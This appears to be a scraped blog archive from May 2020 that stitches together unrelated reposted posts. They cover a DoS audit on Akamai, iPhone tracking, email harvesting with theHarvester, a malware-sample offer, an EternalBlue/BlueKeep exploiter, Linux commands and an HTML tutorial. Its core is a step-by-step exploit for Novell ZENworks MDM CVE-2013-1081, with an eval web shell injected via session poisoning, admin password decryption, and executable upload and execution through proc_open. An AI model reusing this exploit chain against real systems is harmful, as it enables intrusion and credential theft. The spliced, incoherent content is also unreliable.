Espaço Cd Barato: maio 2020

quinta-feira, 21 de maio de 2020

Vulcan DoS Vs Akamai

In the past I had to do several DoS security audits, with múltiples types of tests and intensities. Sometimes several DDoS protections were present like Akamai for static content, and Arbor for absorb part of the bandwith.

One consideration for the DoS/DDoS tools is that probably it will loss the control of the attacker host, and the tool at least has to be able to stop automatically with a timeout, but can also implement remote response checks.

In order to size the minimum mbps needed to flood a service or to retard the response in a significant amount of time, the attacker hosts need a bandwith limiter, that increments in a logarithmic way up to a limit agreed with the customer/isp/cpd.

There are DoS tools that doesn't have this timeouts, and bandwith limit based on mbps, for that reason I have to implement a LD_PRELOAD based solution: bwcontrol

Although there are several good tools for stressing web servers and web aplications like apache ab, or other common tools used for pen-testing, but I also wrote a fast web flooder in c++ named wflood.

As expected the most effective for taking down the web server are the slow-loris, slow-read and derivatives, few host were needed to DoS an online banking.

Remote attacks to database and highly dynamic web content were discarded, that could be impacted for sure.

I did another tool in c++ for crafting massive tcp/udp/ip malformed packets, that impacted sometimes on load balancers and firewalls, it was vulcan, it freezed even the firewall client software.

The funny thing was that the common attacks against Akamai hosts, where ineffective, and so does the slow-loris family of attacks, because are common, and the Akamai nginx webservers are well tunned. But when tried vulcan, few intensity was enough to crash Akamai hosts.

Another attack vector for static sites was trying to locate the IP of the customer instead of Akamai, if the customer doesn't use the Akamai Shadow service, it's possible to perform a HTTP Host header scan, and direct the attack to that host bypassing Akamai.

And what about Arbor protection? is good for reducing the flood but there are other kind of attacks, and this protection use to be disabled by default and in local holidays can be a mess.

Related posts

How To Track Iphone Without Them Knowing

Few feelings are as stomach-sinkingly awful as the thought of losing an expensive new iPhone. Whether you left it on the bus or someone slid it out of your back pocket, we put so much store in our phones that their loss leaves is saddened and angered. Most of us keep at least copies of everything in our lives on our phones, from personal conversations to emails,

To say nothing of all our personal information and social media accounts. Of course there are security measures in place, but nobody wants to risk having all that information fall into the hands of the wrong people. In this article, I will show you how to find a phone that has been lost, whether your own phone or the phone of a friend or family member.

Can you track an iPhone without them knowing?

First off, hopefully you activated the Find My Phone feature of your iPhone when you still had it in your possession. Secondly, if your phone doesn't have service (and thus a connection to the Internet) or if you don't have iCloud set up, then these solutions are not going to work for you. Unfortunately phone technology is advanced but it isn't magical; if your phone isn't talking to the network or if you haven't turned on Find My Phone, then unfortunately the technological solution is probably not going to work. (Seriously. If you have possession of your phone(s) then stop reading this article, pick up your devices, go to Settings and select "Find My Phone" (iPhone) or "Find My Device" (Android) and make sure they are toggled on. TTjem upi cam dp ot/"

Without further ado, let's find your phone!

Can I Tell if Someone is Tracking my iPhone?

image1-3

Usually yes, if someone is using the "Find my Phone" feature, it will be displaying things on the iPhone screen. Thankfully, "Find My iPhone" comes pre-loaded on all phones with iOs 9 or newer. "Find my iPhone" is the gold standard when it comes to locating your lost iPhone. The service is integrated as part of iCloud. Here's how to use it to find your missing iPhone then track down your phone's exact location.

Step 1: Open up the "Find My iPhone" on a different device

It doesn't matter if you decide to use your iPad, your laptop, or a friend's iPhone – you can run the Find My Phone app fr0m Mac. You can use the Find my Phone app.

If you are using an Apple product like another phone or an iPad, you can simply click on the app.

If you are using a computer (even a Windows PC will work), go to icloud.com then click on the "Find iPhone" icon. Once you've clicked on the "Find iPhone" icon the website process and "Find my iPhone" app process are the same.

Step 2: Input Your Apple ID Credentials (they are the same as your iCloud info)

Since you are not using your phone, you won't be automatically logged in.

Once you log in to the app, select the "All Devices" drop-down option and then find the device that you want to locate.

Step 3: Once You Select Your Phone, Options Will Appear

As soon as you select your device on the page, iCloud will begin to search for it. If the search is successful, you will see your device on a map, pinpointing it's location. Before you sprint out the door to get it, there are some other options you should take a look at.

Once you select your device you will have three additional options in addition to seeing your phone's location. These options are playing a sound, activating "Lost Mode" and erase the phone.

Playing the sound is a great way to find your phone if you lost it somewhere around your house. If you click the option, an audio alert will go off on your phone which will hopefully help you find it. The alert will sound like a loud pinging noise alerting you that your phone is at home with you and not at the coffee shop you just visited. If you hear the pinging sound then you'll quickly find your phone by just following the sound.

When enabled, Lost Mode will lock your phone with a passcode and will display a message of your choice. This can either ensure it will be safe until you can find it, or will alert the thief what you expect of them and that you know where they are. This mode can also enable location services on your phone too.

However, if things have gone too far and you think there is a very slim chance you will ever get your device back – perhaps your phone has already crossed an international border – the best course of action is to simply erase it. Yes, this is giving up, but it also prevents your personal information getting into the hands of someone who could abuse it.

If you follow these steps, you should have your phone back in your pocket in no time.

Is there an app to track someones phone without them knowing?

maxresdefault-11

What if you're looking for someone else's phone? I'm sorry to burst your bubble, but you are not allowed to track someone else's phone without their knowledge. While there are supposedly apps that you can install on a target's phone to track it and keep tabs on what they are doing on it, that is completely illegal and immoral. In addition to the moral issue, there is the practical fact that they could find the app which could lead to a very awkward situation, possibly one involving the police.

However, there are times when you want to find a friend's phone and you have a legitimate reason, and (the important part) they have given you permission to find it. Just as when you were looking for your own phone, there is an app that can help you find the phones of your friends and family with ease. The "Find My Friends" app used to be an extra download, but now it comes with iOS, so if your friends have ever updated their phone, they should have it.

"Find My Friends" is an app that basically allows you to share your location with others and vice versa. It can be great for keeping track of where your kids are, knowing what your significant other is doing, or just keeping tabs on your friends. It can also help them find a lost phone (as long as you have "Shared Locations" with them). Here is how to set it up:

Step 1: Open the app on your phone and the phone of the person you want to be able to share locations with.

Step 2: Click your profile in the bottom left of the screen.

Step 3: Enable "Share My Location" and make sure AirDrop is enabled on your own phone.

Step 4: From there, your friends and family will be able to search/add you to share your location with them and vice versa. You each will need to accept the "Shared Location" request from the other. Now, you can just click on their profile in the app and keep track of them.

As you likely realized while reading this article, it is a much better idea to be proactive than reactive when it comes to tracking phones. If you set up "Find My iPhone" and "Find My Friends" before your phone gets stolen or lost, it will save you a lot of potential hassle down the road. While it may be a bit worrisome to have someone be able to see your location at all times, it can really save you once your phone goes missing and you need to track it down. It is obviously best to pick someone who you trust not to take advantage of the information an app like "Find My Friends" can provide them.

No one deserves to have their phone stolen or go missing, but thankfully, there are some ways to find it, or at least have the information deleted. Hopefully, this guide helped you be able to find your phone or the phone of your friends and family, or at least prepared you for when it may happen.

If you have other ways of finding a lost phone, please share them with us below!

@EVERYTHING NT

quarta-feira, 20 de maio de 2020

Theharvester: Email Harvesting Throughout Year

You might have harvested many things upto now but what we are going to harvest today is something bad :)

Requirements:

A Linux box (I'm using Kali Linux)
theharvester program (already available in Kali Linux)

So what does theharvester harvest? Well it harvests email addresses. theharvester is an Information gathering tool. If you want a list of emails to spam you can get that easily from theharvester tool and go on Spamming (I'm joking its illegal). It's a security tool that helps you in pentesting an organization (as always it can be used for evil as well). You can gather emails from an organization and look for potential victims to attack or use brute-force techniques to get their passwords or Social Engineer them into doing something that will let you compromise some or all systems in the organization. Uhh there are so many things that you can do when you have access to someone's email address.

OK stop talking and start doing.

Fire up a terminal in your kali box and type this command:

theharvester -d hotmail.com -l 50 -b google

In a small amount of time you'll see your terminal flooded with 200 hotmail.com email address. What does this command mean?

theharvester is the tool name that we are using
-d <domain_name> specifies the domain (or website) who's email addresses we're looking for, in our case it was hotmail.com
-l <number> specifies the number of results that we want in the output, I limited it to 50
-b <source> specifies the source on which to look for email addresses, I specified google as the source

Besides google we can specify any of the follow as source:
google, googleCSE, bing, bingapi, pgp, linkedin, google-profiles, people123, jigsaw, twitter, googleplus, all
Here the last entry all means look in every available source.

Let's say you wanted to look in every available source they you should specify the following command:

theharvester -d hotmail.com -b all

-f is another great flag which can be utilized to save the output in case we want to SPAM them later (just kidding) or for other reasons (I'm thinking positive). -f flag saves the result in html or xml format. Let's do just that:

theharvester -d gmail.com -l 50 -b google -f emailaddresses.html

here -f flag is followed by the location where we want to store the file and the name of file, in our case we stored it in our pwd (present working directory) with the name emailaddresses.html.

Above picture shows an html output generated by harvester.

That's it for this tutorial hope to see you next time!

terça-feira, 19 de maio de 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.

Time to wake up - https://www.youtube.com/watch?v=vQObWW06VAM

For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:

Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]

I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.

The actual CVE details are as follows:

"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."

After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:

POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=

Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:

<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== '' && $Language != $_SESSION["language"])
{
//check for validity
if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
{
$_SESSION["language"] = $Language;
}
}

if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);

In English:

Check if the "language" parameter is passed in on the request
If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
If the session variable "language" is set, include it into the page
Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:

$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;

The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:

egrep -R '\$_SESSION\[.*\] =' ./

This pulled up a ton of results, including the following:

/desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];

Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
require_once( $_SESSION["language"]);
} else
{
require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey'] > 0)
{

} else
{
$_SESSION['$error'] = LOGIN_FAILED_TEXT;
header('Location: index.php');
}

The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)

This will create a session file named "sess_payload" that we can include, the file contains the following:

user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";

Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:

return mdm_DecryptData($result[0]['Password']);

Ends up it is magic – so I sent the following PHP to be executed on the server -

$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);

Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_creds.rb

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));

This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.

After we have uploaded the file we can then carry out another request to execute what has been uploaded:

$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
$output=explode("\\n",+stream_get_contents($pipes[1]));
fclose($pipes[1]);
proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};

The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:

https://github.com/steponequit/CVE-2013-1081/blob/master/novell_mdm_lfi.rb

Update: Metasploit modules are now available as part of metasploit.

More information

segunda-feira, 18 de maio de 2020

Top Process Related Commands In Linux Distributions

Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux processes commands which are are given below.

ps

The "ps" command is used in Linux to display your currently active processes over the Linux based system. It will give you all the detail of the processes which are active on the system.

ps aux|grep

The "ps aux|grep" command is used in Linux distributions to find all the process id of particular process like if you wanna know about all the process ids related to telnet process then you just have to type a simple command like "ps aux|grep 'telnet'". This command will give you the details about telnet processes.

pmap

The "pmap" command in Linux operating system will display the map of processes running over the memory in Linux based system.

top

The "top" command is used in Linux operating system to display all the running processes over the system's background. It will display all the processes with process id (pid) by which you can easily kill/end the process.

Kill pid

Basically the kill command is used to kill or end the process or processes by simply giving the process id to the kill command and it will end the process or processes. Just type kill and gave the particular process id or different process ids by putting the space in between all of them. kill 456 567 5673 etc.

killall proc

The "killall proc" is the command used in Linux operating system to kill all the processes named proc in the system. Killall command just require a parameter as name which is common in some of the processes in the system.

bg

The "bg" is the command used in Linux distributions to resume suspended jobs without bringing them to foreground.

fg

The "fg" command is used in Linux operating system to brings the most recent job to foreground. The fg command also requires parameters to do some actions like "fg n" n is as a parameter to fg command that brings job n to the foreground.

ANNOUNCEMENT: Submitters Of Papers And Training For Global AppSec DC 2019 (Formerly AppSec USA)

We had an overwhelming turnout out of submissions for Call for Papers and Call for Training for the OWASP Global AppSec DC 2019 (formerly AppSec USA) We want to give each submission the time deserved to evaluate each before choosing. Keeping that in mind the notifications of acceptance and thanks will be CHANGED to July 1, 2019. We appreciate your understanding and patience in this matter.

https://dc.globalappsec.org/

Related posts

domingo, 17 de maio de 2020

Ask And You Shall Receive

I get emails from readers asking for specific malware samples and thought I would make a mini post about it.

Yes, I often obtain samples from various sources for my own research.

I am sometimes too lazy/busy to post them but don't mind sharing.
If you are looking for a particular sample, feel free to ask. I might have it.

Send MD5 (several or few samples). I cannot provide hundreds/thousands of samples or any kind of feeds. If you ask for a particular family, I might be able to help if I already have it.

Unfortunately, I do not have time to do homework for students and provide very specific sets for malware with specific features as well as guarantee the C2s are still active. Send your MD5(s) or at least malware family and I check if I have it :) If i have it, I will either send you or will post on the blog where you can download.

If you emailed me in the past and never got an answer, please remind me. Sometimes emails are long with many questions and I flag them to reply to later, when I have time and they get buried or I forget. It does not happen very often but accept my apologies if it happened to you.

Before you ask, check if it is already available via Contagio or Contagio Mobile.
1. Search the blog using the search box on the right side
2. Search here https://www.mediafire.com/folder/b8xxm22zrrqm4/BADINFECT
3. Search here https://www.mediafire.com/folder/c2az029ch6cke/TRAFFIC_PATTERNS_COLLECTION
4. Search here https://www.mediafire.com/folder/78npy8h7h0g9y/MOBILEMALWARE

Cheers, Mila

Continue reading

sábado, 16 de maio de 2020

HOW TO CAPTURE SCREENSHOT IN KALI LINUX? – KALI LINUX TUTORIAL

Kali Linux has been the most advanced penetration testing machine introduced yet. It has the most valuable tools used for every sort of hacking. To take advantage of Kali Linux hacking tools, you have to switch your OS to Kali Linux. You can either install Kali Linux as your default OS or just install as a virtual machine within the same OS. You can learn more about how to install Kali Linux Virtualbox. Today in this tutorial, I am just going to share a very simple Kali Linux tutorial on how to capture screenshot in Kali Linux. It's very simple and newbie friendly.

SO, HOW TO CAPTURE SCREENSHOT IN KALI LINUX? – KALI LINUX TUTORIAL

There are two ways to capture a screenshot in Kali Linux. One is the ultimate easy one and the second one is a bit complex but it's also not so complicated. So, don't worry about anything.

INSTRUCTIONS TO FOLLOW

In a first way, you can take a screenshot in a similar way as you take in Windows OS by simply clicking the PrntScr button on the keyboard. As you hit that button, a screenshot will be saved in the Pictures folder of your Kali Linux. The major problem with it, it only captures the full screen. We have no control over it to capture a specific window or region.
The second way is to take a screenshot using the command. For that, open up a terminal in the Kali Linux and type apt-get install ImageMagick.
Once the command is completed and ImageMagick is installed. We have two options to take a screenshot with it. One is to capture full screen and second is to capture a specific window.
To capture full screen, type import -window root Pictures/AnyNameOfTheImage.png in the terminal. It will take a full screenshot and will save it to the Pictures directory by the name you specify. Make sure to type .png at the end of the file name.
To take a screenshot of a specific window or region, type import Pictures/AnyNameOfTheImage.png in the terminal and hit Enter, it will turn the cursor to a selection tool. You just click the mouse button and select the area you want to capture. As you will leave the mouse key, screenshot will be saved in the Pictures folder.

That's all how you can capture screenshot in Kali Linux. This is a very simple and beginner-friendly Kali Linux tutorial to help out all the newbies how they can use this features in need. Hope it will be useful for you.

ISPY: Exploiting EternalBlue And BlueKeep Vulnerabilities With Metasploit Easier

About ISPY:
   ISPY is a Eternalblue (MS17-010) and BlueKeep (CVE-2019-0708) scanner and exploiter with Metasploit Framework.

   ISPY was tested on: Kali Linux and Parrot Security OS 4.7.

ISPY's Installation:
   For Arch Linux users, you must install Metasploit Framework and curl first:
pacman -S metasploit curl

   For other Linux distros not Kali Linux or Parrot Security OS. Open your Terminal and enter these commands to install Metasploit Framework:

   Then, enter these commands to install ISPY:

How to use ISPY?

ISPY's screenshots:

About the author:

On Github: @Cyb0r9
On Youtube: Cyborg
On Ask Fm: Cyborg
Email: TunisianEagles@protonmail.com

Disclaimer: Usage of ispy for attacking targets without prior mutual consent is illegal.
ispy is for security testing purposes only

Download ISPY

Related posts

Chapter 1To 5 HTML

Contents

About

................................................................................................................................................................................... 1

Chapter 1: Getting started with HTML

................................................................................................................ 2

Section 1.1: Hello World 2

Chapter 2: Doctypes

.................................................................................................................................................... 4

Section 2.1: Adding the Doctype 4

Section 2.2: HTML 5 Doctype 4

Chapter 3: Headings

.................................................................................................................................................... 5

Section 3.1: Using Headings 5

Chapter 4: Paragraphs

.............................................................................................................................................. 6

Section 4.1: HTML Paragraphs

Chapter 5: Text Formatting

..................................................................................................................................... 6

..................................................................................................................................... 7

Section 5.1: Highlighting 7

Section 5.2: Bold, Italic, and Underline 7

Section 5.3: Abbreviation 8

Section 5.4: Inserted, Deleted, or Stricken 8

Section 5.5: Superscript and Subscript 8

Chapter 1: Getting started with HTML

Version Speciﬁcation Release Date

1.0 N/A 1994-01-01

2.0 RFC 1866

1995-11-24

3.2 W3C: HTML 3.2 Speciﬁcation

1997-01-14

4.0 W3C: HTML 4.0 Speciﬁcation

1998-04-24

4.01 W3C: HTML 4.01 Speciﬁcation

1999-12-24

5 WHATWG: HTML Living Standard

2014-10-28

5.1 W3C: HTML 5.1 Speciﬁcation

2016-11-01

Section 1.1: Hello World

Introduction

HTML (Hypertext Markup Language) uses a markup system composed of elements which represent speciﬁc content. Markup means that with HTML you declare what is presented to a viewer, not how it is presented. Visual representations are deﬁned by Cascading Style Sheets (CSS) and realized by browsers. Still existing elements that allow for such, like e.g. font, "are entirely obsolete, and must not be used by authors"[1].

HTML is sometimes called a programming language but it has no logic, so is a markup language. HTML tags provide semantic meaning and machine-readability to the content in the page.

An element usually consists of an opening tag (<element_name>), a closing tag (</element_name>), which contain the element's name surrounded by angle brackets, and the content in between:

<element_name>...content...</element_name>

There are some HTML elements that don't have a closing tag or any contents. These are called void elements. Void elements include <img>, <meta>, <link> and <input>.

Element names can be thought of as descriptive keywords for the content they contain, such as video, audio, table, footer.

A HTML page may consist of potentially hundreds of elements which are then read by a web browser, interpreted and rendered into human readable or audible content on the screen.

For this document it is important to note the diﬀerence between elements and tags:

Elements: video, audio, table, footer

Tags: <video>, <audio>, <table>, <footer>, </html>, </body>

Element insight

Let's break down a tag...

The <p> tag represents a common paragraph.

Elements commonly have an opening tag and a closing tag. The opening tag contains the element's name in angle brackets (<p>). The closing tag is identical to the opening tag with the addition of a forward slash (/) between the opening bracket and the element's name (</p>).

Content can then go between these two tags: <p>This is a simple paragraph.</p>.

Creating a simple page

The following HTML example creates a simple "Hello World" web page.

HTML ﬁles can be created using any text editor. The ﬁles must be saved with a .html or .htm[2] extension in order to be recognized as HTML ﬁles.

Once created, this ﬁle can be opened in any web browser.

Simple page break down

These are the tags used in the example:

Tag Meaning

<!DOCTYPE> Deﬁnes the HTML version used in the document. In this case it is HTML5.

See the doctypes topic for more information.

Opens the page. No markup should come after the closing tag (</html>). The lang attribute declares

<html>

<head>

<meta>

the primary language of the page using the ISO language codes (en for English). See the Content Language topic for more information.

Opens the head section, which does not appear in the main browser window but mainly contains information about the HTML document, called metadata. It can also contain imports from external stylesheets and scripts. The closing tag is </head>.

Gives the browser some metadata about the document. The charset attribute declares the character encoding. Modern HTML documents should always use UTF-8, even though it is not a requirement. In HTML, the <meta> tag does not require a closing tag.

See the Meta topic for more information.

<title> The title of the page. Text written between this opening and the closing tag (</title>) will be displayed on the tab of the page or in the title bar of the browser.

<body> Opens the part of the document displayed to users, i.e. all the visible or audible content of a page. No content should be added after the closing tag </body>.

<h1> A level 1 heading for the page.

See headings for more information.

<p> Represents a common paragraph of text.

1. ↑ HTML5, 11.2 Non-conforming features

2. ↑ .htm is inherited from the legacy DOS three character ﬁle extension limit.

Chapter 2: Doctypes

Doctypes - short for 'document type' - help browsers to understand the version of HTML the document is written in for better interpretability. Doctype declarations are not HTML tags and belong at the very top of a document. This topic explains the structure and declaration of various doctypes in HTML.

Section 2.1: Adding the Doctype

The <!DOCTYPE> declaration should always be included at the top of the HTML document, before the <html> tag.

Version ≥ 5

See HTML 5 Doctype for details on the HTML 5 Doctype.

Section 2.2: HTML 5 Doctype

HTML5 is not based on SGML (Standard Generalized Markup Language), and therefore does not require a reference to a DTD (Document Type Deﬁnition).

HTML 5 Doctype declaration:

Case Insensitivity

Per the W3.org HTML 5 DOCTYPE Spec:

A DOCTYPE must consist of the following components, in this order:

1. A string that is an ASCII case-insensitive match for the string "<!DOCTYPE".

therefore the following DOCTYPEs are also valid:

This SO article discusses the topic extensively: Uppercase or lowercase doctype?

Chapter 3: Headings

HTML provides not only plain paragraph tags, but six separate header tags to indicate headings of various sizes and thicknesses. Enumerated as heading 1 through heading 6, heading 1 has the largest and thickest text while heading 6 is the smallest and thinnest, down to the paragraph level. This topic details proper usage of these tags.

Section 3.1: Using Headings

Headings can be used to describe the topic they precede and they are deﬁned with the <h1> to <h6> tags. Headings support all the global attributes.

<h1> deﬁnes the most important heading.

<h6> deﬁnes the least important heading.

Deﬁning a heading:

Correct structure matters

Search engines and other user agents usually index page content based on heading elements, for example to create a table of contents, so using the correct structure for headings is important.

In general, an article should have one h1 element for the main title followed by h2 subtitles – going down a layer if necessary. If there are h1 elements on a higher level they shoudn't be used to describe any lower level content.

Example document (extra intendation to illustrate hierarchy):

Chapter 4: Paragraphs

Column Column

<p> Deﬁnes a paragraph

<br> Inserts a single line break

<pre> Deﬁnes pre-formatted text

Paragraphs are the most basic HTML element. This topic explains and demonstrates the usage of the paragraph element in HTML.

Section 4.1: HTML Paragraphs

The HTML <p> element deﬁnes a paragraph:

Display-

You cannot be sure how HTML will be displayed.

Large or small screens, and resized windows will create diﬀerent results.

With HTML, you cannot change the output by adding extra spaces or extra lines in your HTML code. The browser will remove any extra spaces and extra lines when the page is displayed:

Chapter 5: Text Formatting

While most HTML tags are used to create elements, HTML also provides in-text formatting tags to apply speciﬁc text-related styles to portions of text. This topic includes examples of HTML text formatting such as highlighting, bolding, underlining, subscript, and stricken text

Section 5.1: Highlighting

The <mark> element is new in HTML5 and is used to mark or highlight text in a document "due to its relevance in another context".1

The most common example would be in the results of a search were the user has entered a search query and results are shown highlighting the desired query.

Output:

A common standard formatting is black text on a yellow background, but this can be changed with CSS.

Section 5.2: Bold, Italic, and Underline

Bold Text

To bold text, use the <strong> or <b> tags:

What's the diﬀerence? Semantics. <strong> is used to indicate that the text is fundamentally or semantically important to the surrounding text, while <b> indicates no such importance and simply represents text that should be bolded.

If you were to use <b> a text-to-speech program would not say the word(s) any diﬀerently than any of the other words around it - you are simply drawing attention to them without adding any additional importance. By using

<strong>, though, the same program would want to speak those word(s) with a diﬀerent tone of voice to convey that the text is important in some way.

Italic Text

To italicize text, use the <em> or <i> tags:

What's the diﬀerence? Semantics. <em> is used to indicate that the text should have extra emphasis that should be stressed, while <i> simply represents text which should be set oﬀ from the normal text around it.

For example, if you wanted to stress the action inside a sentence, one might do so by emphasizing it in italics via

<em>: "Would you just submit the edit already?"

But if you were identifying a book or newspaper that you would normally italicize stylistically, you would simply use

<i>: "I was forced to read Romeo and Juliet in high school.

Underlined Text

While the <u> element itself was deprecated in HTMl 4, it was reintroduced with alternate semantic meaning in HTML 5 - to represent an unarticulated, non-textual annotation. You might use such a rendering to indicate misspelled text on the page, or for a Chinese proper name mark.

Section 5.3: Abbreviation

To mark some expression as an abbreviation, use <abbr> tag:

If present, the title attribute is used to present the full description of such abbreviation.

Section 5.4: Inserted, Deleted, or Stricken

To mark text as inserted, use the <ins> tag:

To mark text as deleted, use the <del> tag:

To strike through text, use the <s> tag:

Section 5.5: Superscript and Subscript

To oﬀset text either upward or downward you can use the tags <sup> and <sub>. To create superscript:

To create subscript:

@EVERYTHINGNT

Continue reading